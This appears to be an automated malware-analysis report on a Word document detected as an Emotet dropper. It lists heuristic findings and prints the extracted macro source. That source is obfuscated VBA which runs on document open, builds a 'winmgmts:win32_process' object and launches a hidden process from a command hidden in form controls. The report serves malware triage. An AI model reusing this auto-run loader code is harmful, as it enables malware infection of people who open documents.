Verdict: MALICIOUS
Risk Score: 172
Heuristics: 7

- ClamAV: Doc.Dropper.Emotet-7545704-0 (critical, CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Dropper.Emotet-7545704-0
- VBA macros detected (medium, OLE_VBA_MACROS; 3 related findings). Document contains VBA macro code.
- GetObject call (high, OLE_VBA_GETOBJ). Matched line in script: `Set Uzdbsfojjee = GetObject(Cjtdozdoa)`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC). Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- Document_Open macro (low, OLE_VBA_DOCOPEN). Matched line in script: `Private Sub Document_open()`
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE). One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL). One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts: 1
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8198 bytes |

SHA-256: a3e10b39797b53a5d290075e00b4400e9756ec500ffdbe66797ff877e2432d01

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. 201 of 304 identifiers look randomly generated (e.g. 'Fehvdqvaayjkf'); 1 string-concatenation chain(s), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Gjlsezfoy"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Dxqfvtjemiqn
End Sub
Attribute VB_Name = "Kzpsjhogyc"
Attribute VB_Base = "0{C3A92FEA-BE50-4275-A0EF-1749FD1B1266}{32F13D05-459A-4157-9783-4BF8986355D8}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Efmhxmxcovifl"
Function Bnxyocpesy()
Select Case Qehxxjwzffc
Case Ftnwhtmc
Psxzxcyarkxe = 7
Nhinqybzvfgax = Atn(4)
Kwlilsfzkzx = Sin(Lvdaxqiak)
Case Kqpwrtwezj
Mwkeihyotrv = Log(3)
Cfdhqpzxyyvci = 6
Dsgweirenma = CSng(Ktsuaxpnsx)
Case Hqnxpbzahlal
Rlaqupxnmf = ChrW(Clsdkvxb)
Dhylbsezsguq = 1
Nccsxtdh = Cos(Znidafnynzh)
End Select
Bgbwfyzu = ChrW(wdKeyP)
Select Case Bygpnfbkdtulq
Case Excbumyfhdrun
Qmjfgytfu = 7
Ugofgfxcvpqwh = Atn(4)
Tzmwlncw = Sin(Bluxlritv)
Case Qbxmxlmraqbs
Ttxxlsjlx = Log(3)
Cekxhclukcyp = 6
Bpfcrasqsry = CSng(Kzjeessuhctto)
Case Tcvdojjcdigea
Szwgbvaytw = ChrW(Ummjdkuwqwuw)
Wfwyoshv = 1
Whoctebhxppp = Cos(Ctgqvvfzsbzvb)
End Select
Wljqzirwxpo = Bgbwfyzu + Kzpsjhogyc.Iqghzjatc + Kzpsjhogyc.Ewgncmzaqnzz
Select Case Qxhmnkrauv
Case Ahzmfzbuzst
Nqhyitmldpm = 7
Njdsupnj = Atn(4)
Rcqwsdlxdwxzu = Sin(Lcocxsne)
Case Srhxexgqup
Wuirrildopsr = Log(3)
Zhadexlkzl = 6
Zyqjzvfs = CSng(Tfaftbydyqor)
Case Pqlyhmuworimm
Xlqhfnvcyek = ChrW(Nnlhastjjglty)
Jwgotnbexks = 1
Omuwaxjafamu = Cos(Offnhretc)
End Select
losd = Kzpsjhogyc.Qbkbrmbxtjm.GroupName
Wlhaarejd = Split(Wljqzirwxpo + LTrim(LTrim(losd)), "//====dsfnnJJJsm388//=")
Select Case Gvwvfbcepcf
Case Ywnygucfacke
Itoncpmv = 7
Deuysxguk = Atn(4)
Pyrssplfsmr = Sin(Tkbocngc)
Case Uczdndvpu
Tuwvjzaqxs = Log(3)
Ufhvsrwq = 6
Qxqtlycwww = CSng(Zqfttnfmiqi)
Case Yfhdxxqxk
Fqncnavpgffrq = ChrW(Ikbaapqomsvty)
Rplgnczdz = 1
Stztnrezpfwj = Cos(Ocbjshwqan)
End Select
Bnxyocpesy = Syomkczovduk + Join(Wlhaarejd, "") + Syomkczovduk
Select Case Aurtrithg
Case Yxrslmqgry
Yrwreekt = 7
Mhanizpd = Atn(4)
Hscqqrvzahb = Sin(Rsburpdvckvkj)
Case Drrnllvgogani
Sbfijvheyojt = Log(3)
Gfhzywjqn = 6
Vmmoqcvkkru = CSng(Hcwmszcr)
Case Iasnkpjbnjunj
Hmoiuqlagrv = ChrW(Xotvfnenyolva)
Vgutbwlno = 1
Iwamvopndyqy = Cos(Pcjxcnuzeezxb)
End Select
End Function
Function Dxqfvtjemiqn()
d = "//====dsfnnJJJsm388//=i//====dsfnnJJJsm388//=//====dsfnnJJJsm388//=n//====dsfnnJJJsm388//=m//====dsfnnJJJsm388//=gmt//====dsfnnJJJsm388//=" + ChrW(wdKeyS) + "//====dsfnnJJJsm388//=:w//====dsfnnJJJsm388//=in//====dsfnnJJJsm388//=32//====dsfnnJJJsm388//=//====dsfnnJJJsm388//=_//====dsfnnJJJsm388//=" + Kzpsjhogyc.Smfucrwlx + "//====dsfnnJJJsm388//=ro//====dsfnnJJJsm388//=ce//====dsfnnJJJsm388//=ss"
Select Case Fouvwxvmie
Case Mqtotqyah
Fskdvxxhchy = 7
Obuubjal = Atn(4)
Ydcznofceix = Sin(Ltaplxfz)
Case Qasveyyv
Emztxjsweug = Log(3)
Yjbbuponokbmz = 6
Begmrbyythrb = CSng(Vtvjbumdw)
Case Rzpcygypz
Ntpxzkhu = ChrW(Jfsqgcyagyh)
Zciwvatme = 1
Fbudubvcashu = Cos(Reaotxtknp)
End Select
E = "//====dsfnnJJJsm388//="
Select Case Anqwvooniww
Case Jzpizelwtuexz
Fhgurtydmxgh = 7
Uphgwonf = Atn(4)
Gztgtlzwx = Sin(Apcsflwdk)
Case Ktzexqcchaaan
Rjaykjgvtzenr = Log(3)
Cwnipagooit = 6
Hzooaftmcl = CSng(Dxffsdlzqxe)
Case Czlvmqqou
Lqmljeakeulc = ChrW(Veivvjvbjx)
Qpvszjklt = 1
Aqmxujkrxkm = Cos(Itydyjhofb)
End Select
Swyxlwtjt = Split("//====dsfnnJJJsm388//=//====dsfnnJJJsm388//=w//====dsfnnJJJsm388//=//====dsfnnJJJsm388//=" + d + T, E)
Select Case Bhcmjswo
Case Kswkqbzwaxut
Kmwesbxzqvcbj = 7
Vvwmmpurguy = Atn(4)
Iuiipgcxvrwnv = Sin(Aiorfffb)
Case Ffquqktez
Ntmcqtzdayrer = Log(3)
Fgrsdskajamcf = 6
Jwufmobp = CSng(Fxxiobydse)
Case Gmdctdberu
Pvjlejerchyun = ChrW(Znyncpwpicjv)
Ktlbztsrmzi = 1
Kyojpbhcqshui = Cos(Bjuogdson)
End Select
Cjtdozdoa = Join(Swyxlwtjt, "")
Select Case Catwrded
Case Qythpmgn
Cfbugjxue = 7
Mrihyakca = Atn(4)
Vmoighlitvy = Sin(Wyzqigkzawdhk)
Case Lvlntokpfxc
Wwloukkabu = Log(3)
Doupkbvhuwxk = 6
Jmjtsfqb = CSng(Lpmzpqkbr)
Case Zqzvvgiozyb
Byqhbodclpev = ChrW(Relwssmkwjywz)
Dgkmtyradz = 1
Moavzgkqjnb = Cos(Frcgjeouph)
End Select
Set Uzdbsfojjee = GetObject(Cjtdozdoa)
Select Case Ajgosjqkki
Case Gvpcscchagbjy
Egioydbjfvl = 7
Xvbaaeubvwqp = Atn(4)
Itiwqqtle = Sin(Gtemkhgpjjfe)
Case Tioikrzszt
Zvwzlragtkpol = Log(3)
Zxudpgmxie = 6
Juoukwoiltjy = CSng(Vqisaxvhz)
Case Paqmyouix
Fqfswgzgnw = ChrW(Lwopeeycvt)
Wxvnfpqqojks = 1
Aoishiape = Cos(Ypdynqlakw)
End Select
Kxyzdhetd = Kzpsjhogyc.Qondygelnww.Tag
Acsvgeyxeodv = Cjtdozdoa + ChrW(wdKeyS) + Kzpsjhogyc.Jfqiubxiqf.Tag + Kxyzdhetd
Select Case Qcplgmegez
Case Vwynwkiuxtr
Hxgvdynvdpctj = 7
Bpdnfmpfi = Atn(4)
Rxzowkgpypy = Sin(Blsshvun)
Case Siqedjsr
Pgqwossmuu = Log(3)
Ecmuuxym = 6
Zvggggdf = CSng(Azluvvdodhsyk)
Case Nriputku
Uqhmliont = ChrW(Qryytjjih)
Qcsouqldqf = 1
Aevcrzekqn = Cos(Zkqbjbmhgkaft)
End Select
Aptjcvlw = Acsvgeyxeodv + Kzpsjhogyc.Smfucrwlx
Select Case Dgqeqlqagnkkj
Case Eeuavfhwemf
Wxahpeulf = 7
Sigitnmonro = Atn(4)
Qxsvjmskd = Sin(Jmcueofz)
Case Inzzcqzr
Hbsrsmzbsaf = Log(3)
Cyhlsjylpjehk = 6
Gvssiswitkcsp = CSng(Mytoxavfh)
Case Fsrokisdvxhmf
Qnaprjgix = ChrW(Vwvlpllmmeq)
Uzljielo = 1
Jherqmyjujw = Cos(Ijhwbtubaiavs)
End Select
Set Dxqfvtjemiqn = GetObject(Aptjcvlw)
Select Case Hidlhjht
Case Tgrxbvapgi
Wmgoeeqeudfe = 7
Yuznpsjaz = Atn(4)
Mjjtpzurnmq = Sin(Fdcyqpbmdvxg)
Case Sqjvngyruglf
Mgthphimpk = Log(3)
Ydjomnzgbb = 6
Cytniwnllqa = CSng(Prijgbyl)
Case Viguxfxil
Eqnvdtxy = ChrW(Clmxwrxvz)
Yryeccpgo = 1
Vykavocibng = Cos(Wtwbnanlwxgz)
End Select
Dxqfvtjemiqn. _
showwindow = False
Select Case Cvhawajh
Case Twqjfzucvwo
Lbhdtgju = 7
Fpqlzxdzks = Atn(4)
Tuhulbrx = Sin(Jtwzpxqalvd)
Case Tonverxdbi
Mvyvhcsir = Log(3)
Paigjkgxyijog = 6
Mffkiknrc = CSng(Edskdtmryvwl)
Case Ullzcgsybpmc
Mbiferfdeneqc = ChrW(Lqurrnybsavyg)
Ybmoewmq = 1
Nqhyumedzpysk = Cos(Oaqfjszbap)
End Select
Do While Uzdbsfojjee. _
Create(pok & Bnxyocpesy, Hibvcqsebdumf, Dxqfvtjemiqn, Mlnvjgbnd)
Loop
Select Case Dufgvakzecgwr
Case Pwtfldmmss
Rilstbgytjmv = 7
Tbcthsgt = Atn(4)
Tlivrhnnm = Sin(Rsknukqrfkyy)
Case Kjylpnxyhy
Lhmwyiaicjsg = Log(3)
Pcfuvnxlg = 6
Cxtvslmfbzj = CSng(Lpybgbrsyh)
Case Smcuvzaniwlg
Yfaljgwwjf = ChrW(Fehvdqvaayjkf)
Raoerowdl = 1
Xrywdwfzuwg = Cos(Vknjzvpfjyfv)
End Select
End Function